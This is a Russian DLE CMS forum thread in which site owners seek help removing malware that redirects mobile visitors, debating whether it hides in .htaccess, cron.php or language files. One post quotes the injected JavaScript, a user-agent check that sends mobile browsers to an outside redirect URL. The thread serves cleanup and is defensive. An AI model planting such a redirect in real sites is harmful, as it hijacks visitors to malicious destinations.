Задать вопрос
Не нравятся результаты поиска? Попробуйте другой поиск!
DLE FAQ » Все вопросы » Общие вопросы » Вирус на сайте (редирект)

Вирус на сайте (редирект)

     09.10.2013    Все вопросы » Общие вопросы    12525

вопрос
Добрый день всем форумчанам.
На сайте появился вирус - происходит редирект на мобильные устройства или на сайт infected.com.
Что сделал:
Удалили везде скрипты и ссылки на FTP.
Изменил пароли на ftp, админке и на сервере.
Визуально ссылок и скриптов не вижу, но яндек все равно ругается что есть вирус.
При запросе уточнения прислали письмо:
"В настоящее время при заходе на сайт через браузер Opera Mobile происходит перенаправление на вредоносную цель refresh-browser.00xff.net . Проверьте, пожалуйста.
Вредоносный код находится на серверной стороне Вашего сайта, поэтому я не могу указать Вам на него. Советую обратиться в техническую поддержку Вашего хостинг-провайдера."

Вот сам пациент - med-na-dom.com

Кто понимает и может помочь - прошу подсказать где искать вирус и как его убрать.
Бьюсь над этой проблемой уже более месяца.
С уважением Дмитрий.
Заранее благодарю.

Ответил: dj-avtosh

в файле .htaccess лишнее ( файл в корне )

17 комментариев

coolteams
Юзер

coolteams - 9 октября 2013 23:58 -

так в мобильном шаблоне и ищите, и еще переименуйте файл cron.php если двиг нуленый, через него опять зальют.
xpchelkinx
Юзер

xpchelkinx - 10 октября 2013 10:50 -

dj-avtosh спасибо, надеюсь что нашел правильно и удалил. Посмотрю что скажет Яндекс.
xpchelkinx
Юзер

xpchelkinx - 10 октября 2013 10:53 -

coolteams спасибо за замечание. подскажите как правильно переименовать cron.php?
Просто переименовать и все?
Или этот файл с чем то связан?
В сети не нашел ответа на данный вопрос.
dj-avtosh
PHP-developer

dj-avtosh - 11 октября 2013 00:13 -

При чем тут крон, казалось бы. Бесят уже непроверенные советы.
По заказам пишем сюда: @Rud00y

ЯД: 41001679231462
Заказы в telegram (ремонт модулей, оптимизация нагрузок и т.п.):
В телегу писать сразу задачу и бюджет.
coolteams
Юзер

coolteams - 11 октября 2013 03:52 -

При том крон! В нуленом двигле в крон запихивают код, которым заливают вирус. Ко мне уже раз сто обращались, чистили полностью все файло, перезаливали, на завтра опять тоже самое, пока крон не переименовали. Бесят когда от балды отписывают, и делают себя умнее всех. 7 лет работы с DLE меня многому научили, если что.
cron-32xnzvsu.php и все дела.
dj-avtosh
PHP-developer

dj-avtosh - 11 октября 2013 16:43 -

1. 7 лет работы с ДЛЕ? :D

2. И вы до сих пор не знаете про айболит и т.п.?

3. Вам чуждо что файлы не переименовываются. А поднимаются логи и латаются дыры.

4. Джумлу Вы тоже будете переименовывать?

5. Да, я умнее Вас. Проверено.
По заказам пишем сюда: @Rud00y

ЯД: 41001679231462
Заказы в telegram (ремонт модулей, оптимизация нагрузок и т.п.):
В телегу писать сразу задачу и бюджет.
dj-avtosh
PHP-developer

dj-avtosh - 11 октября 2013 16:46 -

Я Вам на будущее советую внимательно читать вопрос, что бы верно отвечать. Человек, который имеет опыт очистки сайта от вирусов, обязан знать что вирус по обновлению мобильного браузера ( ИМХО опера и т.п. ) прописывает себя в .htaccess

Это сделано только для того, что бы вирус обрабатывался с любой страницы.

Удачи, надеюсь скоро отметите юбилей с ДЛЕ :D
По заказам пишем сюда: @Rud00y

ЯД: 41001679231462
Заказы в telegram (ремонт модулей, оптимизация нагрузок и т.п.):
В телегу писать сразу задачу и бюджет.
coolteams
Юзер

coolteams - 11 октября 2013 17:18 -

dj-avtosh я вот читаю ваши сообщения, ни одного! ответа по существу, левые отписки. Нет желания даже с вами спорить, кто умнее.
..и все сообщения ради рекламной подписи.
dj-avtosh
PHP-developer

dj-avtosh - 11 октября 2013 17:20 -

Вы отписываетесь на сайте, который мы писали при отсутствии логики.
По заказам пишем сюда: @Rud00y

ЯД: 41001679231462
Заказы в telegram (ремонт модулей, оптимизация нагрузок и т.п.):
В телегу писать сразу задачу и бюджет.
coolteams
Юзер

coolteams - 11 октября 2013 17:33 -

поздравляю, вовесьте баннер сверху
xpchelkinx
Юзер

xpchelkinx - 14 октября 2013 10:56 -

Ответил: dj-avtosh
в файле .htaccess лишнее ( файл в корне )

Я вроде бы удалил, но Яндекс продолжает ругаться. Прошу Вас указать на вредоносный код в htaccess по вашему мнению.
С уважением Дмитрий.
dj-avtosh
PHP-developer

dj-avtosh - 14 октября 2013 11:08 -

Надо в вебмастере задать заявку на переиндексацию и ждать.
По заказам пишем сюда: @Rud00y

ЯД: 41001679231462
Заказы в telegram (ремонт модулей, оптимизация нагрузок и т.п.):
В телегу писать сразу задачу и бюджет.
xpchelkinx
Юзер

xpchelkinx - 14 октября 2013 14:24 -

dj-avtosh Дал, ответ пришел что код все еще есть.
По этому и повторно обратился к Вам.
Engel
Юзер

Engel - 16 ноября 2013 21:08 -

Кто поможет? Похожая ситуация, только код немножко другой:

<script type="text/javascript">
<!--
if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone)/i)!==null){
window.location = "http://webtds1.ru/go.php?sid=1";
}
//-->
</script>

Появляется в шаблоне Smartphone - main.tpl . Быди проверены все файлы и папки сайта (конечно же и .htaccess), все чисто. Удаляю код и через некоторое время (от 4 до 6 часов) код прописывается в шаблоне опять. Яндекс уже второй раз вешает свою метку на сайт.

Помогите, люди добрые!
ПафНутиЙ
Админ

ПафНутиЙ - 17 ноября 2013 00:45 -

Возможно вредоносный код есть в файлах, выполняющихся по крону.
Каков вопрос - таков и ответ. Просто помните об этом.
bembelby
Юзер

bembelby - 17 ноября 2013 10:29 -

Раньше подобный код перенаправления на мобильные устройства я находил у себя нак сайте в файлах website.lng, engine.php, init.php, dbconfig.php
Gabr
Юзер

Gabr - 29 ноября 2013 19:01 -

Столкнулся с такой же бедой, практически - перелопатил все вышеуказанные файлы. Перепробовал все возможные методы от онлайн сервисов до заливания некоторых утилит, сайт Др.Веб все равно ругался и показывал, что есть "вредный" редирект.
Только в website.lng был код. Удалил - все стало замечательно.
Чтобы комментировать - войдите или зарегистрируйтесь на сайте

Похожие вопросы

 13.09.2013 Wizard2030  Общие вопросы
 18.09.2013 Бахмут  Общие вопросы
 11.03.2014 batman_wlad  Общие вопросы
 17.04.2014 xpchelkinx  Общие вопросы
 15.05.2014 Бахмут  Общие вопросы
 06.07.2014 justalex  Общие вопросы
 06.08.2014 ig55555or  Общие вопросы, Общие вопросы по PHP
 15.08.2014 prolight  Общие вопросы
 25.09.2014 Lynat1k  Общие вопросы
 04.12.2014 motonix  Общие вопросы
  • Darkzone | Выбор категории для доп. поля? 4
    Фото Darkzone
    Darkzone
    Выбор категории для доп. поля?
    Вчера, 17:08
    Разъясните как вытащить id?
  • lutskboy | Вытащить все данные из определенного доп ... 1
    Фото lutskboy
    lutskboy
    Вытащить все данные из определенного доп поля?
    Вчера, 16:17
    в adminer можно.
  • lutskboy | Выбор категории для доп. поля? 4
    Фото lutskboy
    lutskboy
    Выбор категории для доп. поля?
    Вчера, 16:14
    выбрать все кроме такого нет. можно с бд достать все ид через запятую и вставить в xfields.txt
    js скрипт можно написать
    
<script>
    window.addEventListener('load', ()=> {
        $('#category').on('change', function() {
            var value = $(this).val();
            if ($.isArray(value)) {
            	ShowOrHideEx("xfield_holder_year", jQuery.inArray('1', value) != -1 || jQuery.inArray('2', value) != -1 );
            } else {
            	ShowOrHideEx("xfield_holder_year", value == 1 || value==2);
            }
        })
    });
</script>
year доп поле . 1 и 2 катег
  • Darkzone | Выбор категории для доп. поля? 4
    Фото Darkzone
    Darkzone
    Выбор категории для доп. поля?
    Вчера, 14:39
    Смотрите, Нужно чтоб обязательное к заполнению доп. поле при добавлении новости, выводилось во всех категориях, кроме двух. Так как количество категорий довольно большое, есть ли способ, не тыкать каждую категорию в которой будет отображаться доп.поле. Надеюсь я смог разъяснить.
  • lutskboy | Выбор категории для доп. поля? 4
    Фото lutskboy
    lutskboy
    Выбор категории для доп. поля?
    Вчера, 13:52
    где выводить? админка или сайт
  • TeraMoune | Как отключить миниатюры стандартной гале ...
    Фото TeraMoune
    TeraMoune
    Как отключить миниатюры стандартной галереи Fancybox?
    21-11-2024, 06:00
    В файле engine/classes/fancybox/fancybox.js искать нужную инициализацию и добавлять соответствующие параметры, весь список параметров и их описание можно найти на этой странице https://fancyapps.com/fancybox/api/options/

    Например: параметр Thumbs: false отключает миниатюры.
    Fancybox.bind("[data-highslide]", {
	groupAttr: 'data-highslide',
	idle:2000,
	Thumbs: false,
	caption: (fancybox, slide) => {
		if(  slide.thumbEl && slide.thumbEl.alt ) {
			return slide.thumbEl.alt
		}
	}
});
  • derebas | Как реализовать шифрование трафика? 3
    Фото derebas
    derebas
    Как реализовать шифрование трафика?
    18-11-2024, 16:52
    Ну в теории, можно использовать src на site.com разместить прокси на site2.com а выдавать видео с site3.com, при этом прямой доступ на site3.com закрыть, отдача будет только если запрос с site2.com, таким образом палится только site2.com, НО источник потокового видео, все равно можно увидеть если захотеть, а ссылки, ну купить домен dsac-43efew-csdds.uz как пример
  • Gordi | Перенёс сайт - не работают кнопки, не от ... 8
    Фото Gordi
    Gordi
    Перенёс сайт - не работают кнопки, не отображаются новости. Как вылечить?
    18-11-2024, 14:46
    я уже делал. Пользователь 1000 (это я так понимаю root) и chmod 777
    Так и было...
  • lutskboy | Перенёс сайт - не работают кнопки, не от ... 8
    Фото lutskboy
    lutskboy
    Перенёс сайт - не работают кнопки, не отображаются новости. Как вылечить?
    18-11-2024, 14:39
    чтоб не удалять выстави права и пользователя какие там идут на файлы. .
  • Gordi | Перенёс сайт - не работают кнопки, не от ... 8
    Фото Gordi
    Gordi
    Перенёс сайт - не работают кнопки, не отображаются новости. Как вылечить?
    18-11-2024, 14:37
    т.е. мне снести всё, что я уже загрузил как root, зайти под юзером и закачать снова?
    Видосы в директории upload можно хоть оставить? их там 80 Гб
наверх